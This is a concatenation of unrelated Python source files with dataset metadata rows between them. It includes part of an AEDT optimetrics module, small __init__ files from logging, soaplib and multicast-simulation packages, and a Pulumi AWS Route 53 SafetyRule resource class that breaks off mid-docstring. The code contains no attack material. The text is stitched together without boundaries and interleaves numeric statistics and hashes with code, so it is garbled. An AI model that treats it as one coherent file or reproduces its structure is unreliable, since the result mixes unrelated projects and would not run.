self.setups.append(self.Setup(parent, data, setups_data[data]))
except:
pass
@aedt_exception_handler
def add_statistical(self, calculation_name, calc_variation_value, calculation_type="Freq",
reporttype="Modal Solution Data", domain="Sweep", solution=None, parametricname=None):
"""Add a basic statistical analysis.
You can customize all options after the analysis is added.
Parameters
----------
calculation_name : str, optional
Name of the calculation.
calc_variation_value : str, optional
Variation value, such as ``"1GHz"``.
calculation_type : str, optional
Variation type. The default is ``"Freq"``.
reporttype : str, optional
Type of report to add the calculation to. The default is
``"Modal Solution Data"``.
domain : str, optional
Type of the domain. The default is ``"Sweep"``.
solution : str, optional
Name of the solution. The default is ``None``, in which case the
nominal sweep is used.
parametricname : str, optional
Name of the analysis. The default is ``None``, in which case the
default name is assigned.
Returns
-------
:class:`Statistical`
"""
if not parametricname:
parametricname = generate_unique_name("Statistical")
setup = self.Setup(self._parent, parametricname)
sweepdefinition = OrderedDict()
sweepdefinition["ReportType"] = reporttype
if not solution:
solution = self._parent.nominal_sweep
sweepdefinition["Solution"] = solution
sweepdefinition["SimValueContext"] = OrderedDict({"Domain": domain})
sweepdefinition["Calculation"] = calculation_name
sweepdefinition["Name"] = calculation_name
sweepdefinition["Ranges"] = OrderedDict({"Range": ["Var:=", calculation_type, "Type:=", "d", "DiscreteValues:=", calc_variation_value]})
setup.props["Goals"]["Goal"] = sweepdefinition
setup.create()
self.setups.append(setup)
return setup
class DOESetups(object):
"""Sets up DOEs (Designs of Experiments).
Parameters
----------
parent :
"""
class Setup(CommonOptimetrics, object):
"""Sets up a DOE (Design of Experiments) in optiSLang.
Parameters
----------
parent : str
Inherited AEDT object.
name :
dictinputs : optional
The default is ``None``.
otimtype : str, optional
Type of the optimization. The default is ``"OptiDXDOE"``.
"""
def __init__(self, parent, name, dictinputs=None):
CommonOptimetrics.__init__(self, parent, name, dictinputs=dictinputs, optimtype="OptiDXDOE")
pass
@aedt_exception_handler
def add_calculation(self, calculation="", calculation_value="", reporttype="Modal Solution Data", solution=None,
domain="Sweep", calculation_name=None):
"""Add a calculation to the DOE (Design of Experiments).
Parameters
----------
calculation : str, optional
Expression for the calculation, such as ``"dB(S(1,1,))"``. The default is ``""``.
calculation_value : str, optional
Value for the calculation, such as ``"1GHz"`` if a sweep. The default is ``""``.
reporttype : str, optional
Name of the report to add the calculation to. The default
is ``"Modal Solution Data"``.
solution : str, optional
Type of the solution. The default is ``None``, in which case the default
solution is used.
domain : str, optional
Type of the domain. The default is ``"Sweep"``. If ``None``, one sweep is taken.
calculation_name : str, optional
Name of the calculation. The default is ``None``.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
"""
return self._add_calculation(reporttype=reporttype, solution=solution, domain=domain, calculation_type="d",
calculation=calculation, calculation_value=calculation_value, calculation_name=calculation_name)
@aedt_exception_handler
def add_goal(self, calculation="", calculation_value="", calculation_type="discrete",
calculation_stop="", reporttype="Modal Solution Data", solution=None, domain="Sweep", goal_name=None, goal_value=1, goal_weight=1, condition="=="):
"""Add a goal to the DOE (Design of Experiments).
Parameters
----------
calculation : str, optional
Expression for the calculation, such as ``"dB(S(1,1,))"``. The default is ``""``.
calculation_value : str, optional
Value for the calculation, such as ``"1GHz"`` if a sweep. The default is ``""``.
If ``calculation_type="discrete"``, the value is discrete or is a list. If the
value is a range, it is the starting value.
calculation_type : str, optional
Type of the calculation. Options are ``"discrete"`` or ``"range"``.
The default is ``"discrete"``.
calculation_stop : str, optional
Stopping value if ``calculation_type="range"``. The default is ``""``.
reporttype : str, optional
Name of the report to add the calculation to. The default
is ``"Modal Solution Data"``.
solution : str, optional
Type of the solution. The default is ``None``, in which case the default
solution is used.
domain : str, optional
Type of the domain. The default is ``"Sweep"``. If ``None``, one sweep is taken.
goal_name : str, optional
Name of the goal. The default is ``None``.
goal_value : optional
Value for the goal. The default is ``1``.
goal_weight : optional
Value for the goal weight. The default is ``1``.
condition : string, optional
The default is ``"=="``.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
"""
return self._add_goal(optigoalname="CostFunctionGoals", reporttype=reporttype, solution=solution,
domain=domain, calculation_type=calculation_type, calculation=calculation,
calc_val1=calculation_value, calc_val2=calculation_stop, goal_name=goal_name,
goal_weight=goal_weight,
goal_value=goal_value, condition=condition)
@property
def parent(self):
"""Parent."""
return self._parent
@property
def optimodule(self):
"""Optimetrics module.
Returns
-------
:class:`Optimetrics`
"""
return self.parent.odesign.GetModule("Optimetrics")
def __init__(self, parent):
self._parent = parent
self.setups = []
if self._parent.design_properties:
try:
setups_data = self._parent.design_properties["Optimetrics"]["OptimetricsSetups"]
for data in setups_data:
if type(setups_data[data]) is OrderedDict and setups_data[data]['SetupType'] == "OptiDXDOE":
self.setups.append(self.Setup(parent, data, setups_data[data]))
except:
pass
@aedt_exception_handler
def add_doe(self, calculation, calculation_value, calculation_type="Freq", reporttype="Modal Solution Data",
domain="Sweep", condition="<=", goal_value=1, goal_weight=1, solution=None, parametricname=None):
"""Add a basic DesignXplorer DOE (Design of Experiments).
You can customize all options after the DOE is added.
Parameters
----------
calculation : str, optional
Expression for the calculation, such as ``"dB(S(1,1,))"``. The default is ``""``.
calculation_value : str, optional
Variation value, such as ``"1GHz"``.
calculation_type : str, optional
Type of the calculation. The default is ``"Freq"``.
calculation_stop : str, optional
Stopping value if ``calculation_type="range"``. The default is ``""``.
reporttype : str, optional
Name of the report to add the calculation to. The default
is ``"Modal Solution Data"``.
domain : str, optional
Type of the domain. The default is ``"Sweep"``. If ``None``, one sweep is taken.
condition : string, optional
The default is ``"<="``.
goal_value : optional
Value for the goal. The default is ``1``.
goal_weight : optional
Value for the goal weight. The default is ``1``.
solution : str, optional
Type of the solution. The default is ``None``, in which case the default
solution is used.
parametricname : str, optional
Name of the analysis. The default is ``None``, in which case a
default name is assigned.
Returns
-------
type
DOE object.
"""
if not solution:
solution = self._parent.nominal_sweep
setupname = [solution.split(" ")[0]]
if not parametricname:
parametricname = generate_unique_name("DesignOfExp")
setup = self.Setup(self._parent, parametricname)
setup.props["Sim. Setups"] = setupname
sweepdefinition = OrderedDict()
sweepdefinition["ReportType"] = reporttype
sweepdefinition["Solution"] = solution
sweepdefinition["SimValueContext"] = OrderedDict({"Domain": domain})
sweepdefinition["Calculation"] = calculation
sweepdefinition["Name"] = calculation
sweepdefinition["Ranges"] = OrderedDict(
{"Range": ["Var:=", calculation_type, "Type:=", "d", "DiscreteValues:=", calculation_value]})
sweepdefinition["Condition"] = condition
sweepdefinition["GoalValue"] = OrderedDict(
{"GoalValueType": "Independent", "Format": "Real/Imag", "bG": ["v:=", "[{};]".format(goal_value)]})
sweepdefinition["Weight"] = "[{};]".format(goal_weight)
setup.props["CostFunctionGoals"]["Goal"] = sweepdefinition
setup.create()
self.setups.append(setup)
return setup
class OptimizationSetups(object):
"""Sets up optimizations.
Parameters
----------
parent :
"""
class Setup(CommonOptimetrics, object):
"""Sets up an optimization in optiSLang.
Parameters
----------
parent : str
Inherited AEDT object.
name :
dictinputs : optional
The default is ``None``.
"""
def __init__(self, parent, name, dictinputs=None):
CommonOptimetrics.__init__(self, parent, name, dictinputs=dictinputs, optimtype="OptiOptimization")
pass
@aedt_exception_handler
def add_goal(self, calculation="", calculation_value="", calculation_type="discrete", calculation_stop="",
reporttype="Modal Solution Data", solution=None, domain="Sweep", goal_name=None, goal_value=1,
goal_weight=1, condition="=="):
"""Add a calculation to the analysis.
Parameters
----------
calculation : str, optional
Expression for the calculation, such as ``"dB(S(1,1,))"``. The default is ``""``.
calculation_value : str, optional
Value for the calculation, such as ``"1GHz"`` if a sweep. The default is ``""``.
If ``calculation_type="discrete"``, the value is discrete or is a list. If the
value is a range, it is the starting value.
calculation_type : str, optional
Type of the calculation. Options are ``"discrete"`` or ``"range"``.
The default is ``"discrete"``.
calculation_stop : str, optional
Stopping value if ``calculation_type="range"``. The default is ``""``.
reporttype : str, optional
Name of the report to add the calculation to. The default
is ``"Modal Solution Data"``.
solution : str, optional
Type of the solution. The default is ``None``, in which case the default
solution is used.
domain : str, optional
Type of the domain. The default is ``"Sweep"``. If ``None``, one sweep is taken.
goal_name : str, optional
Name of the goal. The default is ``None``.
goal_value : optional
Value for the goal. The default is ``1``.
goal_weight : optional
Value for the goal weight. The default is ``1``.
condition : string, optional
The default is ``"=="``.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
"""
return self._add_goal(optigoalname="Goals", reporttype=reporttype, solution=solution, domain=domain,
calculation_type=calculation_type, calculation=calculation,
calc_val1=calculation_value, calc_val2=calculation_stop, goal_name=goal_name, goal_value=goal_value, goal_weight=goal_weight, condition=condition)
@property
def parent(self):
"""Parent."""
return self._parent
@property
def optimodule(self):
"""Optimetrics module.
Returns
-------
:class:`Optimetrics`
"""
return self.parent.odesign.GetModule("Optimetrics")
def __init__(self, parent):
self._parent = parent
self.setups = []
if self._parent.design_properties:
try:
setups_data = self._parent.design_properties["Optimetrics"]["OptimetricsSetups"]
for data in setups_data:
if type(setups_data[data]) is OrderedDict and setups_data[data]['SetupType'] == "OptiOptimization":
self.setups.append(self.Setup(parent, data, setups_data[data]))
except:
pass
@aedt_exception_handler
def add_optimization(self, calculation, calculation_value, calculation_type="Freq",
reporttype="Modal Solution Data", domain="Sweep", condition="<=", goal_value=1, goal_weight=1,
solution=None, parametricname=None):
"""Add a basic optimization analysis.
You can customize all options after the analysis is added.
Parameters
----------
calculation : str, optional
Name of the calculation.
calculation_value : str, optional
Variation value, such as ``"1GHz"``.
calculation_type : str, optional
Type of the calculation. The default is ``"Freq"``.
reporttype : str, optional
Name of the report to add the calculation to. The default
is ``"Modal Solution Data"``.
domain : str, optional
Type of the domain. The default is ``"Sweep"``. If ``None``, one sweep is taken.
condition : string, optional
The default is ``"<="``.
goal_value : optional
Value for the goal. The default is ``1``.
goal_weight : optional
Value for the goal weight. The default is ``1``.
solution : str, optional
Type of the solution. The default is ``None``, in which case the default
solution is used.
parametricname : str, optional
Name of the analysis. The default is ``None``, in which case a
default name is assigned.
Returns
-------
type
Optimization object.
"""
if not parametricname:
parametricname = generate_unique_name("Optimization")
setup = self.Setup(self._parent, parametricname)
sweepdefinition = OrderedDict()
sweepdefinition["ReportType"] = reporttype
if not solution:
solution = self._parent.nominal_sweep
sweepdefinition["Solution"] = solution
sweepdefinition["SimValueContext"] = OrderedDict({"Domain": domain})
sweepdefinition["Calculation"] = calculation
sweepdefinition["Name"] = calculation
sweepdefinition["Ranges"] = OrderedDict({"Range": ["Var:=", calculation_type, "Type:=", "d", "DiscreteValues:=", calculation_value]})
sweepdefinition["Condition"] = condition
sweepdefinition["GoalValue"] = OrderedDict(
{"GoalValueType": "Independent", "Format": "Real/Imag", "bG": ["v:=", "[{};]".format(goal_value)]})
sweepdefinition["Weight"] = "[{};]".format(goal_weight)
setup.props["Goals"]["Goal"] = sweepdefinition
setup.create()
self.setups.append(setup)
return setup
| 41.762634
| 180
| 0.547981
| 4,978
| 54,542
| 5.903174
| 0.06147
| 0.047301
| 0.051045
| 0.024297
| 0.833935
| 0.815354
| 0.790342
| 0.766419
| 0.750119
| 0.71694
| 0
| 0.003903
| 0.342415
| 54,542
| 1,305
| 181
| 41.794636
| 0.815424
| 0.326849
| 0
| 0.645161
| 1
| 0
| 0.131797
| 0.005106
| 0
| 0
| 0
| 0
| 0
| 1
| 0.085389
| false
| 0.018975
| 0.00759
| 0
| 0.178368
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4690ab3a34648a123a9cfa60eee1be3d150093f9
| 128
|
py
|
Python
|
utils/__init__.py
|
mroohian/aio-chat-server
|
ed929640dcb714dbe1b6321a28e6f27e86f43d4b
|
[
"MIT"
] | null | null | null |
utils/__init__.py
|
mroohian/aio-chat-server
|
ed929640dcb714dbe1b6321a28e6f27e86f43d4b
|
[
"MIT"
] | null | null | null |
utils/__init__.py
|
mroohian/aio-chat-server
|
ed929640dcb714dbe1b6321a28e6f27e86f43d4b
|
[
"MIT"
] | null | null | null |
from ._logger import setup_logger
from ._simulate_slow_write import simulate_slow_write
from ._receive_line import receive_line
| 32
| 53
| 0.882813
| 19
| 128
| 5.421053
| 0.473684
| 0.23301
| 0.330097
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.09375
| 128
| 3
| 54
| 42.666667
| 0.887931
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d3eeb4d27e82997e0b831da42089dbeb87e1951d
| 177
|
py
|
Python
|
soaplib/core/__init__.py
|
divaliu1408/overfit
|
083dcfaa758391092933e19544462cd831e73ef0
|
[
"Apache-2.0"
] | null | null | null |
soaplib/core/__init__.py
|
divaliu1408/overfit
|
083dcfaa758391092933e19544462cd831e73ef0
|
[
"Apache-2.0"
] | null | null | null |
soaplib/core/__init__.py
|
divaliu1408/overfit
|
083dcfaa758391092933e19544462cd831e73ef0
|
[
"Apache-2.0"
] | null | null | null |
# Declare as a package-type of module.
from _base import Application
from _base import ValidatingApplication
from _base import MethodContext
from _base import MethodDescriptor
| 25.285714
| 39
| 0.847458
| 23
| 177
| 6.347826
| 0.608696
| 0.219178
| 0.383562
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.135593
| 177
| 6
| 40
| 29.5
| 0.954248
| 0.20339
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d3fd85d2588c0cbf80d8610fb07c7286a177e78d
| 195
|
py
|
Python
|
simulation/multicast/__init__.py
|
nzarin/rollercoaster-tudelft
|
1a1f4bfe3c6bbd107b04d37cfd83a9adf2a39037
|
[
"MIT"
] | 2
|
2021-11-21T17:27:52.000Z
|
2022-01-31T10:14:02.000Z
|
simulation/multicast/__init__.py
|
lambdapioneer/rollercoaster
|
5341cea20b8bc028aaa308d6cea5bf0f349d8eb4
|
[
"MIT"
] | null | null | null |
simulation/multicast/__init__.py
|
lambdapioneer/rollercoaster
|
5341cea20b8bc028aaa308d6cea5bf0f349d8eb4
|
[
"MIT"
] | null | null | null |
from simulation.multicast.base import Group, create_factory
from simulation.multicast.unicast import SequentialUnicastStrategy
from simulation.multicast.rollercoaster import RollercoasterStrategy
| 65
| 68
| 0.902564
| 20
| 195
| 8.75
| 0.6
| 0.24
| 0.394286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.061538
| 195
| 3
| 68
| 65
| 0.956284
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
3131fdf49019bac2a43b75f16a01079934ff7754
| 27,687
|
py
|
Python
|
sdk/python/pulumi_aws/route53recoverycontrol/safety_rule.py
|
chivandikwa/pulumi-aws
|
19c08bf9dcb90544450ffa4eec7bf6751058fde2
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2021-11-10T16:33:40.000Z
|
2021-11-10T16:33:40.000Z
|
sdk/python/pulumi_aws/route53recoverycontrol/safety_rule.py
|
chivandikwa/pulumi-aws
|
19c08bf9dcb90544450ffa4eec7bf6751058fde2
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/route53recoverycontrol/safety_rule.py
|
chivandikwa/pulumi-aws
|
19c08bf9dcb90544450ffa4eec7bf6751058fde2
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['SafetyRuleArgs', 'SafetyRule']
@pulumi.input_type
class SafetyRuleArgs:
def __init__(__self__, *,
control_panel_arn: pulumi.Input[str],
rule_config: pulumi.Input['SafetyRuleRuleConfigArgs'],
wait_period_ms: pulumi.Input[int],
asserted_controls: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
gating_controls: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
name: Optional[pulumi.Input[str]] = None,
target_controls: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing a SafetyRule resource.
:param pulumi.Input[str] control_panel_arn: ARN of the control panel in which this safety rule will reside.
:param pulumi.Input['SafetyRuleRuleConfigArgs'] rule_config: Configuration block for safety rule criteria. See below.
:param pulumi.Input[int] wait_period_ms: Evaluation period, in milliseconds (ms), during which any request against the target routing controls will fail.
:param pulumi.Input[Sequence[pulumi.Input[str]]] asserted_controls: Routing controls that are part of transactions that are evaluated to determine if a request to change a routing control state is allowed.
:param pulumi.Input[Sequence[pulumi.Input[str]]] gating_controls: Gating controls for the new gating rule. That is, routing controls that are evaluated by the rule configuration that you specify.
:param pulumi.Input[str] name: Name describing the safety rule.
:param pulumi.Input[Sequence[pulumi.Input[str]]] target_controls: Routing controls that can only be set or unset if the specified `rule_config` evaluates to true for the specified `gating_controls`.
"""
pulumi.set(__self__, "control_panel_arn", control_panel_arn)
pulumi.set(__self__, "rule_config", rule_config)
pulumi.set(__self__, "wait_period_ms", wait_period_ms)
if asserted_controls is not None:
pulumi.set(__self__, "asserted_controls", asserted_controls)
if gating_controls is not None:
pulumi.set(__self__, "gating_controls", gating_controls)
if name is not None:
pulumi.set(__self__, "name", name)
if target_controls is not None:
pulumi.set(__self__, "target_controls", target_controls)
@property
@pulumi.getter(name="controlPanelArn")
def control_panel_arn(self) -> pulumi.Input[str]:
"""
ARN of the control panel in which this safety rule will reside.
"""
return pulumi.get(self, "control_panel_arn")
@control_panel_arn.setter
def control_panel_arn(self, value: pulumi.Input[str]):
pulumi.set(self, "control_panel_arn", value)
@property
@pulumi.getter(name="ruleConfig")
def rule_config(self) -> pulumi.Input['SafetyRuleRuleConfigArgs']:
"""
Configuration block for safety rule criteria. See below.
"""
return pulumi.get(self, "rule_config")
@rule_config.setter
def rule_config(self, value: pulumi.Input['SafetyRuleRuleConfigArgs']):
pulumi.set(self, "rule_config", value)
@property
@pulumi.getter(name="waitPeriodMs")
def wait_period_ms(self) -> pulumi.Input[int]:
"""
Evaluation period, in milliseconds (ms), during which any request against the target routing controls will fail.
"""
return pulumi.get(self, "wait_period_ms")
@wait_period_ms.setter
def wait_period_ms(self, value: pulumi.Input[int]):
pulumi.set(self, "wait_period_ms", value)
@property
@pulumi.getter(name="assertedControls")
def asserted_controls(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Routing controls that are part of transactions that are evaluated to determine if a request to change a routing control state is allowed.
"""
return pulumi.get(self, "asserted_controls")
@asserted_controls.setter
def asserted_controls(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "asserted_controls", value)
@property
@pulumi.getter(name="gatingControls")
def gating_controls(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Gating controls for the new gating rule. That is, routing controls that are evaluated by the rule configuration that you specify.
"""
return pulumi.get(self, "gating_controls")
@gating_controls.setter
def gating_controls(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "gating_controls", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name describing the safety rule.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="targetControls")
def target_controls(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Routing controls that can only be set or unset if the specified `rule_config` evaluates to true for the specified `gating_controls`.
"""
return pulumi.get(self, "target_controls")
@target_controls.setter
def target_controls(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "target_controls", value)
@pulumi.input_type
class _SafetyRuleState:
def __init__(__self__, *,
arn: Optional[pulumi.Input[str]] = None,
asserted_controls: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
control_panel_arn: Optional[pulumi.Input[str]] = None,
gating_controls: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
name: Optional[pulumi.Input[str]] = None,
rule_config: Optional[pulumi.Input['SafetyRuleRuleConfigArgs']] = None,
status: Optional[pulumi.Input[str]] = None,
target_controls: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
wait_period_ms: Optional[pulumi.Input[int]] = None):
"""
Input properties used for looking up and filtering SafetyRule resources.
:param pulumi.Input[str] arn: ARN of the safety rule.
:param pulumi.Input[Sequence[pulumi.Input[str]]] asserted_controls: Routing controls that are part of transactions that are evaluated to determine if a request to change a routing control state is allowed.
:param pulumi.Input[str] control_panel_arn: ARN of the control panel in which this safety rule will reside.
:param pulumi.Input[Sequence[pulumi.Input[str]]] gating_controls: Gating controls for the new gating rule. That is, routing controls that are evaluated by the rule configuration that you specify.
:param pulumi.Input[str] name: Name describing the safety rule.
:param pulumi.Input['SafetyRuleRuleConfigArgs'] rule_config: Configuration block for safety rule criteria. See below.
:param pulumi.Input[str] status: Status of the safety rule. `PENDING` when it is being created/updated, `PENDING_DELETION` when it is being deleted, and `DEPLOYED` otherwise.
:param pulumi.Input[Sequence[pulumi.Input[str]]] target_controls: Routing controls that can only be set or unset if the specified `rule_config` evaluates to true for the specified `gating_controls`.
:param pulumi.Input[int] wait_period_ms: Evaluation period, in milliseconds (ms), during which any request against the target routing controls will fail.
"""
if arn is not None:
pulumi.set(__self__, "arn", arn)
if asserted_controls is not None:
pulumi.set(__self__, "asserted_controls", asserted_controls)
if control_panel_arn is not None:
pulumi.set(__self__, "control_panel_arn", control_panel_arn)
if gating_controls is not None:
pulumi.set(__self__, "gating_controls", gating_controls)
if name is not None:
pulumi.set(__self__, "name", name)
if rule_config is not None:
pulumi.set(__self__, "rule_config", rule_config)
if status is not None:
pulumi.set(__self__, "status", status)
if target_controls is not None:
pulumi.set(__self__, "target_controls", target_controls)
if wait_period_ms is not None:
pulumi.set(__self__, "wait_period_ms", wait_period_ms)
@property
@pulumi.getter
def arn(self) -> Optional[pulumi.Input[str]]:
"""
ARN of the safety rule.
"""
return pulumi.get(self, "arn")
@arn.setter
def arn(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "arn", value)
@property
@pulumi.getter(name="assertedControls")
def asserted_controls(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Routing controls that are part of transactions that are evaluated to determine if a request to change a routing control state is allowed.
"""
return pulumi.get(self, "asserted_controls")
@asserted_controls.setter
def asserted_controls(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "asserted_controls", value)
@property
@pulumi.getter(name="controlPanelArn")
def control_panel_arn(self) -> Optional[pulumi.Input[str]]:
"""
ARN of the control panel in which this safety rule will reside.
"""
return pulumi.get(self, "control_panel_arn")
@control_panel_arn.setter
def control_panel_arn(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "control_panel_arn", value)
@property
@pulumi.getter(name="gatingControls")
def gating_controls(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Gating controls for the new gating rule. That is, routing controls that are evaluated by the rule configuration that you specify.
"""
return pulumi.get(self, "gating_controls")
@gating_controls.setter
def gating_controls(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "gating_controls", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name describing the safety rule.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="ruleConfig")
def rule_config(self) -> Optional[pulumi.Input['SafetyRuleRuleConfigArgs']]:
"""
Configuration block for safety rule criteria. See below.
"""
return pulumi.get(self, "rule_config")
@rule_config.setter
def rule_config(self, value: Optional[pulumi.Input['SafetyRuleRuleConfigArgs']]):
pulumi.set(self, "rule_config", value)
@property
@pulumi.getter
def status(self) -> Optional[pulumi.Input[str]]:
"""
Status of the safety rule. `PENDING` when it is being created/updated, `PENDING_DELETION` when it is being deleted, and `DEPLOYED` otherwise.
"""
return pulumi.get(self, "status")
@status.setter
def status(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "status", value)
@property
@pulumi.getter(name="targetControls")
def target_controls(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Routing controls that can only be set or unset if the specified `rule_config` evaluates to true for the specified `gating_controls`.
"""
return pulumi.get(self, "target_controls")
@target_controls.setter
def target_controls(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "target_controls", value)
@property
@pulumi.getter(name="waitPeriodMs")
def wait_period_ms(self) -> Optional[pulumi.Input[int]]:
"""
Evaluation period, in milliseconds (ms), during which any request against the target routing controls will fail.
"""
return pulumi.get(self, "wait_period_ms")
@wait_period_ms.setter
def wait_period_ms(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "wait_period_ms", value)
class SafetyRule(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
asserted_controls: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
control_panel_arn: Optional[pulumi.Input[str]] = None,
gating_controls: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
name: Optional[pulumi.Input[str]] = None,
rule_config: Optional[pulumi.Input[pulumi.InputType['SafetyRuleRuleConfigArgs']]] = None,
target_controls: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
wait_period_ms: Optional[pulumi.Input[int]] = None,
__props__=None):
"""
Provides an AWS Route 53 Recovery Control Config Safety Rule
## Example Usage
```python
import pulumi
import pulumi_aws as aws
example = aws.route53recoverycontrol.SafetyRule("example",
asserted_controls=[aws_route53recoverycontrolconfig_routing_control["example"]["arn"]],
control_panel_arn="arn:aws:route53-recovery-control::313517334327:controlpanel/abd5fbfc052d4844a082dbf400f61da8",
wait_period_ms=5000,
rule_config=aws.route53recoverycontrol.SafetyRuleRuleConfigArgs(
inverted=False,
threshold=1,
type="ATLEAST",
))
```
```python
import pulumi
import pulumi_aws as aws
example = aws.route53recoverycontrol.SafetyRule("example",
control_panel_arn="arn:aws:route53-recovery-control::313517334327:controlpanel/abd5fbfc052d4844a082dbf400f61da8",
wait_period_ms=5000,
gating_controls=[aws_route53recoverycontrolconfig_routing_control["example"]["arn"]],
target_controls=[aws_route53recoverycontrolconfig_routing_control["example"]["arn"]],
rule_config=aws.route53recoverycontrol.SafetyRuleRuleConfigArgs(
inverted=False,
threshold=1,
type="ATLEAST",
))
```
## Import
Route53 Recovery Control Config Safety Rule can be imported via the safety rule ARN, e.g.,
```sh
$ pulumi import aws:route53recoverycontrol/safetyRule:SafetyRule myrule arn:aws:route53-recovery-control::313517334327:controlpanel/1bfba17df8684f5dab0467b71424f7e8/safetyrule/3bacc77003364c0f
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] asserted_controls: Routing controls that are part of transactions that are evaluated to determine if a request to change a routing control state is allowed.
:param pulumi.Input[str] control_panel_arn: ARN of the control panel in which this safety rule will reside.
:param pulumi.Input[Sequence[pulumi.Input[str]]] gating_controls: Gating controls for the new gating rule. That is, routing controls that are evaluated by the rule configuration that you specify.
:param pulumi.Input[str] name: Name describing the safety rule.
:param pulumi.Input[pulumi.InputType['SafetyRuleRuleConfigArgs']] rule_config: Configuration block for safety rule criteria. See below.
:param pulumi.Input[Sequence[pulumi.Input[str]]] target_controls: Routing controls that can only be set or unset if the specified `rule_config` evaluates to true for the specified `gating_controls`.
:param pulumi.Input[int] wait_period_ms: Evaluation period, in milliseconds (ms), during which any request against the target routing controls will fail.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: SafetyRuleArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides an AWS Route 53 Recovery Control Config Safety Rule
## Example Usage
```python
import pulumi
import pulumi_aws as aws
example = aws.route53recoverycontrol.SafetyRule("example",
asserted_controls=[aws_route53recoverycontrolconfig_routing_control["example"]["arn"]],
control_panel_arn="arn:aws:route53-recovery-control::313517334327:controlpanel/abd5fbfc052d4844a082dbf400f61da8",
wait_period_ms=5000,
